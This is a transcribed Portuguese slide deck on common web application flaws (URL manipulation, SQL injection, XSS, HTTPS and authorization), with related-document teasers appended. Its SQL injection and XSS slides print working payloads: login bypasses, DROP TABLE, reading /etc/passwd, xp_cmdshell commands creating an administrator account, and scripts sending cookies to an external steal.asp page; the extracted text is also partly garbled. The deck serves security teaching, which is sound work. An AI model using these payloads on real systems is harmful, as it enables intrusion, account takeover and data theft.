Falhas mais comuns em aplicações web
|
|
- Ana Luísa Teixeira Figueiroa
- 8 Há anos
- Visualizações:
Transcrição
1 Falhas mais comuns em aplicações web Rodrigo Assad, out/2007 1
2 Agenda Introdução Explicando cada ataque através de exemplos URL Manipulation SQL Injection XSS Cross Site Scripting Como resolve-los O que HTTPS nos oferece Porque HTTPS não resolve nossos problemas? Introdução Os ataques a serviços de rede estão se tornando muito sofisticados A criatividade humana não para Mas o que faltava? APLICAÇÕES!!! Mas será que é possível? Atualmente a maioria dos BUG s reportados estão em aplicações Application Security!= Network Security Não se esqueçam: Quem provê acesso aos dados? As aplicações!!! 2
3 Introdução Lendas Urbanas Não ha problemas Até que a aplicação seja comprometida Erros de runtime não são problemas (tratamento de erros) Exponham informações relevantes Consumam todo recurso do servidor Web Services não são vulneráveis Quase nunca testados e raramente segurança é considerada Introdução - Números Gartner 75% dos ataques acontecem no nível das aplicações Em caso de falha no sistema provavelmente os desenvolvedores são três vezes mais culpados do que os administradores de sistemas NIST 92% das vulnerabilidadces estão no nível das aplicações 3
4 Introdução Nosso foco será demonstrar estes BUG s de forma prática Para nos proteger temos que entender das táticas e armas no nosso inimigo Temos que ter nossas armas para nos defender!!! 4
5 Testes e segurança por onde vai. Contexto Não há segurança de sistemas sem a conjuncão de tres fatores Boas praticas de codificação Metodologia adequada (arquitetura e etc) Testes... E ai vem... 5
6 O que é segurança Segurança em um end line Mas o que é isso? Não se discute segurança sem entender de Arquitetura de Computadores, Sistemas Operacionais, Redes de computadores (protocolos de comunicação, Linguagem de programação, engenharia de software e Logica. O que é segurança Entao o que eu preciso saber para se poder testar... Opção 1: seguir os procedimentos definidos alguem que sabe disso tudo Opção 2: Saber disso tudo 6
7 Então para o que querem... Então para o que querem... 7
8 Então para o que querem... Então para o que querem... 8
9 Então para o que querem... Então para o que querem... 9
10 Então para o que querem... Segurança de Redes Recursos Sites
11 Segurança de Redes Periódicos Linux Journal Sys Admin Magazine Information Security SC Info Security Magazine Security Magazine (Nacional) Testes 11
12 OSSTMM 12
13 Agora faça seu checklist O que fazer? O que testar? Como fazer? São as resposta que queremos. Vamos começar por... AQUI Em Aplicações WEB 13
14 URL Manipulation O comando GET requisita informações importantes na URL Os parâmetros podem ser manipulados para se obter resultados satisfatórios O impacto é ALTO Variações podem ser feitas para se tentar obter resultados interessantes ebitamount=1 URL Manipulation 14
15 URL Manipulation SQL Injection A idéia é injetar um comando SQL (Structured Query Language) ou comando como imput dos dados em um formulário WEB Todos os parâmetros passados são direcionados para o banco de dados O atacante pode manipular com as tabelas e dados diretamente 15
16 Causas - SQL Injection public void OnLogon(object src, EventArgs e){ SqlConnectioncon = new SqlConnection( "server=(local);database=mydb;uid=sa;pwd;" ); string query = String.Format( "SELECT COUNT(*) FROM Users WHERE " + "username='{0}' AND password='{1}'", txtuser.text, txtpassword.text ); SqlCommand cmd = new SqlCommand(query, con); conn.open(); SqlDataReader reader = cmd.executereader(); try{ if(reader.hasrows()) IssueAuthenticationTicket(); else TryAgain(); } finally{ con.close() } } SQL Injection Problemas Esperado: username: abc password: teste123 Quando submetido a query será montada como: select * from users where username='abc abc' and password = 'test123 test123' Não esperado: username: abc'; -- password: A query enviada para o banco de dados será: select * from users where uname='abc abc ; --' and password='' 16
17 SQL Injection Problemas Esperado: Username: doug Password: SELECT COUNT(*) FROM Users WHERE username='doug doug' and Não esperado: Username: ' OR 1=1 -- Password: SELECT COUNT(*) FROM Users WHERE username='' ' OR 1=1 -- and password='' SQL Injection Site vulnerável Login com Sucesso Usuário Malicioso Esperado Não esperado 17
18 SQL Injection Mais exemplos Identificando campos de uma tabela SELECT fieldlist FROM table WHERE field = 'x' ' AND IS NULL; --'; Verificando se a tabela existe SELECT , passwd, login_id, full_name FROM table WHERE = 'x'' AND 1=(SELECT COUNT(*) FROM tabname); --'; SQL Injection Mais exemplos Procurando por usuários SELECT , passwd, login_id, full_name FROM members WHERE = 'x'' OR full_name LIKE '%Maria Maria%'; Ataques de força bruta SELECT , passwd, login_id, full_name FROM members WHERE = ususario ususario@provedor provedor.com' AND passwd = senha senha '; 18
19 SQL Injection Mais exemplos Verificando as permissões no Database SELECT , passwd, login_id, full_name FROM members WHERE = 'x';' DROP TABLE members; --'; Criando um usuário SELECT , passwd, login_id, full_name FROM members WHERE = 'x';' INSERT INTO members (' ',' ','passwd passwd',' ','login_id login_id', 'full_name full_name') VALUES ( usuario@provedor.com', ( usuario@provedor.com', senha', senha', user user', ', User da Internet');-- --'; SQL Injection Mais exemplos Alterando o mail de comunicação SELECT , passwd, login_id, full_name FROM members WHERE = 'x';' UPDATE members SET = usuario@provedor.com' WHERE = usuario@hackprovedor.com usuario@hackprovedor.com'; 19
20 Caracteres utilizados ' ou " Utilizado para indicar tipo char -- ou # Comentário /* */ Comentário de várias linhas + Adição, concatenação Concatenação % Wildcard?Param1=foo&Param2=bar Parâmetros da URL PRINT Muito utilizado quando não temos Variável Variável Global waitfor delay '0:0:10' Delay SQL Injection here=all&sort_mode=delete%20*%20from %20users_uses 20
21 Determinando a versão do SGBD Na maioria do tempo as mensagens de erro nos ajudam a identificar qual o SGBD utilizado As mensagens de erro ODBC mostram SGBD utilizado Se não tivermos as mensagens ODBC Tentamos analisar qual a tecnologia utilizada na aplicação e no servidor WEB Tentamos utilizar caracteres, comandos ou stored procedures que geram erros específicos Determinando a versão do SGBD Concatenat e Strings Null replace Positio n Op Sys interactio n Cast MS SQL T-SQL ' '+' ' Isnull() CHARIND EX xp_cmdsh ell Yes MySQL concat (" ", " ") Ifnull() LOCATE() select into outfile / dumpfile No Access " "&" " Iff(Isnull() ) InStr() #date# No Oracle PL/SQL ' ' ' ' Ifnull() InStr() utf_file No DB2 " "+" " Ifnull() InStr() import from export to Yes Postgres PL/pgSQL ' ' ' ' COALESC E() TEXTPOS( ) Call Yes 21
22 Interagindo com o sistema Operacional Existem duas maneiras de se interagir com o sistema operacional Lendo arquivos Obtendo arquivos de senhas Trocando senhas dos usuários Executando comandos que troquem parâmetros do sistema Execução direta de comandos Não ha limites!!! Qualquer ação depende do privilégio que o usuários utilizado pelo SGBD possui MySQL e a interação O.S. MySQL LOAD_FILE ' union select 1,load_file('/etc/passwd'),1,1,1; LOAD DATA INFILE create table temp( line blob ); load data infile '/etc/passwd' into table temp; select * from temp; SELECT INTO OUTFILE 22
23 MS SQL e a interação O.S. MS SQL Server '; exec master..xp_cmdshell 'ipconfig > test.txt' -- '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' -- '; begin varchar(8000) ; ' ; ' from tmp where txt<@data ; as x into temp end -- ' and 1 in (select substring(x,1,256) from temp) -- '; sysname; = 'del test.txt'; EXEC drop table temp; drop table tmp -- Arquitetura mais comum Sempre tenha em mente O SQL normalmente é executado em um outro servidor O servidor de BD normalmente não tem acesso a Internet e é protegido Web Server Application Server Database Server Paginas WEB Validação Da Entrada Execução Do SQL 23
24 Comando de rede relevantes Usando a SP xp_cmdshell podemos executar: Ipconfig /all Tracert myip arp -a nbtstat -c netstat -ano route print Manipulando com as informações da rede '; varchar(256); = ' del test.txt && arp -a >> test.txt && ipconfig /all >> test.txt && nbtstat -c >> test.txt && netstat -ano >> test.txt && route print >> test.txt && tracert -w 10 -h 10 google.com >> test.txt'; EXEC -- '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' -- '; begin varchar(8000) ; ' ; ' from tmp where txt<@data ; as x into temp end -- ' and 1 in (select substring(x,1,255) from temp) -- '; sysname; = 'del test.txt'; EXEC drop table temp; drop table tmp -- 24
25 Manipulando com o S.O. Linux MySQL ' union select 1, (load_file('/etc/passwd')),1,1,1; MS SQL Criando usuários '; exec xp_cmdshell 'net user /add victor Pass123'-- '; exec xp_cmdshell 'net localgroup /add administrators victor' -- Iniciando serviços '; exec master..xp_servicecontrol 'start','ftp Publishing' -- Obtendo a senha do VNC '; binary(8) output select cast(@out as bigint) as x into TEMP-- ' and 1 in (select cast(x as varchar) from temp) -- 25
26 XSS Cross Site Scripting WEB Session Hijaking Não a ligação entre o ID do login e o ID da sessão A sessão do usuário pode ser roubada Impacto é ALTO A idéia e obter de alguma forma o HASH da sessão 26
27 Cross Site Scripting sitehaker.com banco.com Webpage + Cookies Link malicioso em uma pagina web ou malicioso Reflected Code <SCRIPT>Envia o Cookie para attacker.com</script> Executed Malicious Link <SCRIPT>Envia cookie / para ` sitehaker.com User Cookie Cross Site Scripting (XSS) Esta vulnerabilidade tira vantagens de sites que não fazem o tratamento dos dados de entrada. O POST contém um script que pode ser executado via browser <script>window.navigate(" somesite.net/steal.asp?cookie=" +document.cookie)</script> 27
28 XSS Como o atacante depura Pode colocar uma mensagem no post <script>alert( this is vulnerable )</script> A aplicação retorna a sua submissão XSS Exemplos Pode se receber um com o um link O resultado é enviado para um site < script>window. navigate(" eal.asp?cookie="+document.cooki e)</script> 28
29 XSS Exemplos do passado ert(%22rfdslabs%22)%3c/script%3e ><script>alert(document.cookie)</script> ge2.html?tw=<script>alert( Test );</script> cument.cookie)</script>&frompage=4&page=1&ct=vvt V&mh=0&sh=0&RN=1 arch_exe?search_text=%22%3e%3cscript%3ealert%28 document.cookie%29%3c%2fscript%3e Solução Sempre valide a sessão com login e os parâmetros críticos 29
30 Sistemas distribuídos Sistemas distribuídos podem ser vistos de maneira geral como diferentes elementos de software (aplicações) executando remotamente (ou em locais remotos) e se comunicando para fornecer/consumir serviços. Conjunto de máquinas autônomas Interconectadas por canais de comunicação Comunicando-se por troca de mensagens Independência de falhas (falhas parciais) Ausência de relógio global Ausência de estado global Estado compartilhado da aplicação (através de comunicação) Sistemas distribuídos Além de considerar todos os problemas anteriores Eles se potencializam num cenário distribuído Precisamos usar Comunicação Segura Autenticação Integridade dos dados trafegados Serviços de rede passam a ser problemas : DNS Principalmente. 30
31 Comunicação segura O que podemos usar VPN: IPSec, PPTP,... Custoso Por ser necessário uma configuração especial, a aplicação depende não somente dela mas da rede prover Mas lembre-se A REDE É INSEGURA!!!!! E a aplicação? Autenticação Integridade dos dados trafegados Que tal uma PKI? Temos Autenticação Temos Integridade e confidenciaidade se encriptarmos os dados 31
32 O que HTTPS nos oferece HTTPS resolve os problemas de segurança apontados anteriormente? Mas então para que usar HTTPS? Muitas vezes dizemos que o uso de HTTPS nos temos o servidor seguro O que HTTPS nos oferece HTTPS é a versão segura do protocolo HTTP que implementa a autenticação e encriptação da comunicação. Previne os ataques do tipo men-in-the-middle e que dados interceptados sejam lidos A autenticação é uma característica muito explorada atualmente ICP-BR 32
33 O que HTTPS nos oferece 1. Negocia qual sistema de codificação será usado durante a transferência 2. Estabelece e troca as chaves de sessão entre o cliente e o servidor 3. Opcionalmente autentica o servidor para o cliente 4. Opcionalmente autentica o cliente para o servidor Autenticação usando certificados e chaves públicas/privadas Fase do desafio (Mensagem Randômica) Identificão da Conexão Randômica (server) Fase do desafio (Mensagem Identificação Randômica) da Conexão Randômica (server) Protocolos de encriptação Protocolos de Encriptação OK Web server End user OK! CA chave pública Chave e certificado público do servidor Se o cliente não tiver a chave pública da CA (recebemos uma mensagem informando O certificado não é valido) Cancel Always Trust Trust this time 33
34 Autenticação usando certificados e chaves públicas/privadas Fase do desafio (Mensagem Randômica Web server Identificão da Conexão Randômica (server) Sessão master Par de chaves simétricas (Encriptado) End user CA chave pública Chave e certificado público do servidor Autenticação usando certificados e chaves públicas/privadas Fase do desafio (Mensagem Randômica Identificão da Conexão Randômica (server) A autenticação do cliente pode começar agora Idenfificão da Conecção Randomica Fase do (server) desafio (Mensagem Randômica Sessão master Leitura Par de chaves simétricas Web server Escrita End user Escrita CA chave pública Chave e certificado Par de chaves público do servidor simétricas Leitura 34
35 Porque HTTPS não resolve nossos problemas? Porque nossos problemas não estão apenas nos protocolos ou na comunicação. Temos problemas nas aplicações e estas hierarquicamente estão acima dos protocolos de comunicação. Autorização Associar direitos, capacidade e habilidades associadas a um assunto A autorização geralmente vem após uma autenticação Ex.: Uma vez que se sabe quem é o usuário foi autenticado o serviço decidirá o que o usuário pode fazer no contexto que ele esta autorizado 35
36 Autorização RBAC Autorização baseada em perfil Autorização baseada em contexto Auditoria Loggin analises Data warehouse Mineração de dados Correlação de eventos 36
37 Próximos passos Componente focado em resolver os problemas apresentados Não intrusivo Flexível Performance Fácil de usar Autenticação Componente para autenticar Login/Senha Certificado Digital Biometria Referências Open-Source Security Testing Methodology Manual Web Application Disassembly with ODBC Error Messages JavaOne 2005 Strategies for Securing Java Technology Code Web Services Security Attacks in Action 9 Ways to Hack a Web App Advanced SQL Injection In SQL Server applications Advanced Cross Site Scripting CROSS-SITE TRACING (XST) SQL Injection Signatures Evasion 37
38 F I M 38
Instituto de Inovação com TIC. [Junho/ 2009]
Instituto de Inovação com TIC [Junho/ 2009] Segurança em aplicações WEB: A nova fronteira rodrigo.assad@cesar.org.br Redes de Computadores (Histórico) Segurança de Redes (Histórico) Robert Tappan
Leia maisSegurança da Internet. Ricardo Terra (rterrabh [at] gmail.com) Segurança da Internet Outubro, 2013 2012 1
Segurança da Internet Ricardo Terra rterrabh [at] gmail.com Outubro, 2013 2012 1 CV Nome: Ricardo Terra Email: rterrabh [at] gmail.com www: ricardoterra.com.br Twitter: rterrabh Lattes: lattes.cnpq.br/
Leia maisTransações Seguras em Bancos de Dados (MySQL)
Transações Seguras em Bancos de Dados (MySQL) Índice Entendendo os storage engines do MySQL 5 1 As ferramentas 1 Mais algumas coisas que você deve saber 1 Com a mão na massa 2 Mais ferramentas Usando o
Leia maisXSS - CROSS-SITE SCRIPTING
Segurança XSS - CROSS-SITE SCRIPTING XSS - CROSS-SITE SCRIPTING Vamos supor a seguinte situação: O site ingenuo.com tem um fórum As pessoas escrevem comentários nesse fórum e eles são salvos diretamente
Leia maisAULA APLICAÇÕES PARA WEB SESSÕES E LOGIN E SENHA
Sumário Construção de sistema Administrativo... 1 Sistema de Login... 2 SQL INJECTION... 2 Técnicas para Evitar Ataques... 2 Formulário de Login e Senha fará parte do DEFAULT... 5 LOGAR... 5 boas... 6
Leia maisBoas Práticas de Desenvolvimento Seguro
Boas Práticas de Desenvolvimento Seguro Julho / 2.012 Histórico de Revisões Data Versão Descrição Autor 29/07/2012 1.0 Versão inicial Ricardo Kiyoshi Página 2 de 11 Conteúdo 1. SEGURANÇA DA INFORMAÇÃO
Leia maisData Transformation Services (DTS) por Anderson Ferreira Souza
Data Transformation Services (DTS) por Anderson Ferreira Souza O Sql Server possui um recurso extremamente poderoso que é muito pouco utilizado pelos administradores e programadores. Com certeza, sendo
Leia maisFonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu
Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Prof. Hederson Velasco Ramos Uma boa maneira de analisar ameaças no nível dos aplicativo é organiza las por categoria de
Leia maisSegurança em Sistemas Web. Addson A. Costa
Segurança em Sistemas Web Addson A. Costa Spoofing de formulários Spoofing consiste em falsificação, por exemplo, na área de redes um computador pode roubar o IP de outro e assim fazer-se passar por ele.
Leia mais(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com
(In)Segurança em Aplicações Web Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com Agenda Introdução Porque segurança em aplicações é prioridade? Principais causas de vulnerabilidades
Leia maisSegurança na WEB Ambiente WEB estático
Segurança de Redes Segurança na WEB Prof. Rodrigo Rocha prof.rodrigorocha@yahoo.com Servidor IIS Apache Cliente Browser IE FireFox Ambiente WEB estático 1 Ambiente Web Dinâmico Servidor Web Cliente Navegadores
Leia maisNoções de. Microsoft SQL Server. Microsoft SQL Server
Noções de 1 Considerações Iniciais Basicamente existem dois tipos de usuários do SQL Server: Implementadores Administradores 2 1 Implementadores Utilizam o SQL Server para criar e alterar base de dados
Leia maisFAPLAN - Faculdade Anhanguera Passo Fundo Gestão da Tecnologia da Informação Banco de Dados II Prof. Eder Pazinatto Stored Procedures Procedimento armazenados dentro do banco de dados Um Stored Procedure
Leia maisPROCEDIMENTOS ARMAZENADOS (Stored Procedures)
PROCEDIMENTOS ARMAZENADOS (Stored Procedures) 1. Introdução Stored Procedure é um conjunto de comandos, ao qual é atribuído um nome. Este conjunto fica armazenado no Banco de Dados e pode ser chamado a
Leia maisAmeaças, riscos e vulnerabilidades Cont. Objetivos
Ameaças, riscos e vulnerabilidades Cont. Prof. Esp. Anderson Maia E-mail: tecnologo.maia@gmail.com Objetivos entender a definição dos termos hacker, cracker e engenharia social; compreender a anatomia
Leia maisGuia de administração para a integração do Portrait Dialogue 6.0. Versão 7.0A
Guia de administração para a integração do Portrait Dialogue 6.0 Versão 7.0A 2013 Pitney Bowes Software Inc. Todos os direitos reservados. Esse documento pode conter informações confidenciais ou protegidas
Leia maisSegurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner
Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos os ataques e suas respectivas
Leia mais3 SERVIÇOS IP. 3.1 Serviços IP e alguns aspectos de segurança
3 SERVIÇOS IP 3.1 Serviços IP e alguns aspectos de segurança Os serviços IP's são suscetíveis a uma variedade de possíveis ataques, desde ataques passivos (como espionagem) até ataques ativos (como a impossibilidade
Leia maisBANCO DE DADOS. info 3º ano. Prof. Diemesleno Souza Carvalho diemesleno@iftm.edu.br www.diemesleno.com.br
BANCO DE DADOS info 3º ano Prof. Diemesleno Souza Carvalho diemesleno@iftm.edu.br www.diemesleno.com.br Na última aula estudamos Unidade 4 - Projeto Lógico Normalização; Dicionário de Dados. Arquitetura
Leia maisJDBC. Java DataBase Connectivity
JDBC Java DataBase Connectivity JDBC??? Uma API que permite o acesso a virtualmente qualquer fonte de dado tabular a partir de um programa escrito em Java O que é uma uma fonte de dados tabular? acesso
Leia maisIntrodução à Engenharia da Computação. Banco de Dados Professor Machado
Introdução à Engenharia da Computação Banco de Dados Professor Machado 1 Sistemas isolados Produção Vendas Compras Banco de Dados Produtos... Banco de Dados Produtos... Banco de Dados Produtos... Desvantagens:
Leia maisSegurança da Informação. Prof. Gleison Batista de Sousa
Segurança da Informação Prof. Gleison Batista de Sousa Ao longo do tempo e com a evolução tecnologia surgiram uma quantidade enorme de problemas desafiadores relacionados a segurança da informação. Quais
Leia maisSQL Linguagem de Definição de Dados. Banco de Dados Profa. Dra. Cristina Dutra de Aguiar Ciferri
SQL Linguagem de Definição de Dados Banco de Dados SQL Structured Query Language Uma das mais importantes linguagens relacionais (se não a mais importante) Exemplos de SGBD que utilizam SQL Oracle Informix
Leia maisAcesso a Bancos de Dados em Java (JDBC)
Acesso a Bancos de Dados em Java (JDBC) Jomi Fred Hübner Universidade Regional de Blumenau Departamento de Sistemas e Computação Roteiro Introdução Objetivo da JDBC Vantagens Visão geral do acesso a SGBDs
Leia maisProgramação Orientada a Objetos com PHP & MySQL Cookies e Sessões. Prof. MSc. Hugo Souza
Programação Orientada a Objetos com PHP & MySQL Cookies e Sessões Prof. MSc. Hugo Souza Se você precisar manter informações sobre seus usuários enquanto eles navegam pelo seu site, ou até quando eles saem
Leia maisSegurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com
UNIVERSIDADE FEDERAL DO PAMPA CAMPUS BAGÉ ENGENHARIA DE COMPUTAÇÃO Segurança em aplicações web: pequenas ideias, grandes resultados alexcamargoweb@gmail.com Sobre o professor Formação acadêmica: Bacharel
Leia maisINSTALANDO E CONFIGURANDO O MY SQL
INSTALANDO E CONFIGURANDO O MY SQL Este tutorial tem como objetivo mostrar como instalar o banco de dados My SQL em ambiente Windows e é destinado aqueles que ainda não tiveram um contato com a ferramenta.
Leia maisAdministração de Usuários e Privilégios no Banco de Dados
Administração de Usuários e Privilégios no Banco de Dados Todo agrupamento de bancos de dados possui um conjunto de usuários de banco de dados. Estes usuários são distintos dos usuários gerenciados pelo
Leia maisPrincipais Comandos SQL Usados no MySql
Principais Comandos SQL Usados no MySql O que é um SGBD? Um Sistema Gerenciador de Banco de Dados (como no Brasil) ou Sistema Gestor de Base de Dados (SGBD) é o conjunto de programas de computador (softwares)
Leia maisManipulação de Banco de Dados com Java 1. Objetivos
Manipulação de Banco de Dados com Java 1. Objetivos Demonstrar os fundamentos básicos para a manipulação de banco de dados com Java; Apresentar a sintaxe de comandos SQL usados em Java. 2. Definições A
Leia maisGerência de Banco de Dados
exatasfepi.com.br Gerência de Banco de Dados Prof. Msc. André Luís Duarte Banco de Dados Os bancos de dados são coleções de informações que se relacionam para criar um significado dentro de um contexto
Leia maisNomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):
Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nos últimos anos uma das vulnerabilidades mais exploradas por usuários mal-intencionados é a injeção de SQL, onde o atacante realiza uma
Leia maisIntrodução à Banco de Dados. Nathalia Sautchuk Patrício
Introdução à Banco de Dados Nathalia Sautchuk Patrício Histórico Início da computação: dados guardados em arquivos de texto Problemas nesse modelo: redundância não-controlada de dados aplicações devem
Leia maisBanco de Dados. Prof. Antonio
Banco de Dados Prof. Antonio SQL - Structured Query Language O que é SQL? A linguagem SQL (Structure query Language - Linguagem de Consulta Estruturada) é a linguagem padrão ANSI (American National Standards
Leia mais13-10-2013. Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com
13-10-2013 Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com Falha segurança Baco PerenBoom Cross-site scripting (XSS) e Logins por canal não seguro
Leia maisAutenticação e Autorização
Autenticação e Autorização Introdução A segurança em aplicações corporativas está relacionada a diversos aspectos, tais como: autenticação, autorização e auditoria. A autenticação identifica quem acessa
Leia maisTCEnet. Manual Técnico. Responsável Operacional das Entidades
TCEnet Manual Técnico Responsável Operacional das Entidades 1 Índice 1. Introdução... 3 2. Características... 3 3. Papéis dos Envolvidos... 3 4. Utilização do TCEnet... 4 4.1. Geração do e-tcenet... 4
Leia maisArmazenamento organizado facilitando SCRUD; Agiliza processo de desenvolvimento de sistemas;
Conjunto de informações relacionadas entre si; Armazenamento organizado facilitando SCRUD; Agiliza processo de desenvolvimento de sistemas; Conjunto de Tabelas onde cada linha é um vetor de dados específico;
Leia maisListando itens em ComboBox e gravando os dados no Banco de Dados MySQL.
Listando itens em ComboBox e gravando os dados no Banco de Dados MySQL. Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2012 Edição 7 Listando e Gravando Listando itens em ComboBox e gravando os dados no
Leia maisBANCO DE DADOS: SQL. Edson Anibal de Macedo Reis Batista. 27 de janeiro de 2010
BANCO DE DADOS: SQL UERN - Universidade do Estado do Rio Grande do Norte. Departamento de Ciências da Computação. 27 de janeiro de 2010 índice 1 Introdução 2 3 Introdução SQL - Structured Query Language
Leia maisTrabalhando com conexão ao banco de dados MySQL no Lazarus. Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2011
Trabalhando com conexão ao banco de dados MySQL no Lazarus Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2011 Edição 4 O Componente Trabalhando com conexão ao banco de dados MySQL no Lazarus Ano: 03/2011
Leia maisMySQL. Prof. César Melo. com a ajuda de vários
MySQL Prof. César Melo com a ajuda de vários Banco de dados e Sistema de gerenciamento; Um banco de dados é uma coleção de dados. Em um banco de dados relacional, os dados são organizados em tabelas. matricula
Leia maisBases de Dados 2007/2008. Aula 9
Bases de Dados 2007/2008 Aula 9 1. T-SQL TRY CATCH 2. TRATAMENTO ERROS RAISERROR 3. TRIGGERS 4. EXERCÍCIOS Sumário Referências http://msdn2.microsoft.com/en-us/library/ms189826.aspx (linguagem t-sql) http://www.di.ubi.pt/~pprata/bd/bd0405-proc.sql
Leia maisIntrodução ao Sistema. Características
Introdução ao Sistema O sistema Provinha Brasil foi desenvolvido com o intuito de cadastrar as resposta da avaliação que é sugerida pelo MEC e que possui o mesmo nome do sistema. Após a digitação, os dados
Leia maisMaker Planet www.makerplanet.com Manual do Usuário
Maker Planet www.makerplanet.com Manual do Usuário Atenção: Este é o rascunho inicial deste documento, visite o Maker Planet.COM (HTTP://www.makerplanet.com/) para obter as atualizações deste documento.
Leia maisArquitetura de BDs Distribuídos. Victor Amorim - vhca Pedro Melo pam2
Victor Amorim - vhca Pedro Melo pam2 Arquitetura de BDs Distribuídos Sistemas de bds distribuídos permitem que aplicações acessem dados de bds locais ou remotos. Podem ser Homogêneos ou Heterogêneos: Homogêneos
Leia maisAula 1 Acesso a Banco de Dados
Laboratório de Banco de Dados Aula 1 Acesso a Banco de Dados Prof. Josenildo Silva jcsilva@ifma.edu.br Introdução O JDBC (Java Database Connectivity) foi criado com o intuito de fornecer aos programadores
Leia maisO que são Bancos de Dados?
SQL Básico Liojes de Oliveira Carneiro professor.liojes@gmail.com www.professor-liojes.blogspot.com O que são Bancos de Dados? É o software que armazena, organiza, controla, trata e distribui os dados
Leia maisProf. Carlos Majer Aplicações Corporativas UNICID
Este material pertence a Carlos A. Majer, Professor da Unidade Curricular: Aplicações Corporativas da Universidade Cidade de São Paulo UNICID Licença de Uso Este trabalho está licenciado sob uma Licença
Leia maisRevisando sintaxes SQL e criando programa de pesquisa. Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2011
Revisando sintaxes SQL e criando programa de pesquisa. Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2011 Edição 5 SELECT * FROM Minha_memoria Revisando Sintaxes SQL e Criando programa de Pesquisa Ano:
Leia maisProf. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1
Segurança na Web Capítulo 9: Segurança em Aplicações Web Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Introdução Quando se fala em segurança na WEB é preciso pensar inicialmente em duas frentes:
Leia maisPHP INTEGRAÇÃO COM MYSQL PARTE 1
INTRODUÇÃO PHP INTEGRAÇÃO COM MYSQL PARTE 1 Leonardo Pereira leonardo@estudandoti.com.br Facebook: leongamerti http://www.estudandoti.com.br Informações que precisam ser manipuladas com mais segurança
Leia maisServer Ferramentas do desenvolvedor Ferramenta de migração Necessidades dos Desenvolvedores A Ferramenta de Migração IceWarp Server permite migrar todos os seus domínios, usuários e mensagens de e-mail
Leia maisLaboratório de Banco de Dados Aula 1 Acesso a Banco de Dados. Prof. Josenildo Silva jcsilva@ifma.edu.br
Laboratório de Banco de Dados Aula 1 Acesso a Banco de Dados Prof. Josenildo Silva jcsilva@ifma.edu.br Introdução O JDBC (Java Database Connectivity) foi criado com o intuito de fornecer aos programadores
Leia maisBANCO DE DADOS II Prof. Ricardo Rodrigues Barcelar http://www.ricardobarcelar.com
- Aula 11-1. INTRODUÇÃO TRIGGERS (GATILHOS OU AUTOMATISMOS) Desenvolver uma aplicação para gerenciar os dados significa criar uma aplicação que faça o controle sobre todo ambiente desde a interface, passando
Leia maisPHP e MySQL Autenticação de Usuários
PHP e MySQL Autenticação de Usuários Programação de Servidores Marx Gomes Van der Linden http://marx.vanderlinden.com.br/ Controle de Acesso A maioria das aplicações web envolve em algum ponto um mecanismo
Leia maisBANCO DE DADOS CONTEÚDO INFORMÁTICA. Prof.: MARCIO HOLLWEG mhollweg@terra.com.br BANCO DE DADOS SGBD TABELA CONCEITOS BÁSICOS
CONTEÚDO HARDWARE - 2 AULAS SISTEMA OPERACIONAL - 2 AULAS INFORMÁTICA Prof.: MARCIO HOLLWEG mhollweg@terra.com.br APLICATIVOS OFFICE - 3 AULAS INTERNET - 1 AULA REDE - 2 AULA SEGURANÇA - 1 AULA BANCO DE
Leia maisPROGRAMAÇÃO EM BANCO DADOS Stored Procedure e Trigger
PROGRAMAÇÃO EM BANCO DADOS Stored Procedure e Trigger A tecnologia de banco de dados permite persistir dados de forma a compartilha-los com varias aplicações. Aplicação 1 aplicação 2 aplicação 3 SGDB Banco
Leia maisC# - Conexão com MySQL
E S T A A P R E S E N T A Ç Ã O F O I E L A B O R A D A COMO M A T E R I A L DE A P O I O À A U L A DO P R O F E S S O R L E O L A R B A C K A O S A L U N O S DA E S C O L A T É C N I C A P O L I M I G.
Leia maisJDBC Java Database Connectivity
5 JDBC Java Database Connectivity Prof. Autor: Daniel Morais dos Reis e-tec Brasil Programação Avançada Para Web Página1 Meta Trabalhar com bancos de dados em aplicações web em JSP através das classes
Leia maisModelo Cliente/Servidor Por HIARLY ALVES
UNICE Ensino Superior Linguagem de Programação Ambiente Cliente Servidor. Modelo Cliente/Servidor Por HIARLY ALVES Fortaleza - CE CONCEITOS Cliente x Servidor. Cliente É um programa (software) executado
Leia maisProgramação WEB (JSP + Banco Dados) Eng. Computação Prof. Rodrigo Rocha http://www.materialdeaula.com.br
Programação WEB (JSP + Banco Dados) Eng. Computação Prof. Rodrigo Rocha http://www.materialdeaula.com.br JSP (Java Server Pages) - JavaServer Pages (JSP) - Tecnologia de programação serverside - Permite
Leia maisBD SQL Server. Licenciatura em Engenharia Informática e Computação. Bases de Dados 2003/04
BD SQL Server SGBD SQL Server Licenciatura em Engenharia Informática e Computação Bases de Dados 2003/04 BD SQL Server Criação da Ligação ao SGBD Entrar no Microsoft SQL Server / Enterprise Manager Criar
Leia maisIntegrando Java com Banco de Dados
Especialização em Engenharia de Software Programação Orientada a Objetos JDBC Java Database Connectivity Sérgio Soares scbs@cin.ufpe.br Objetivos Apresentar os conceitos básicos da especificação de Java
Leia maisCONFIGURAÇÃO DE REDE SISTEMA IDEAGRI - FAQ CONCEITOS GERAIS
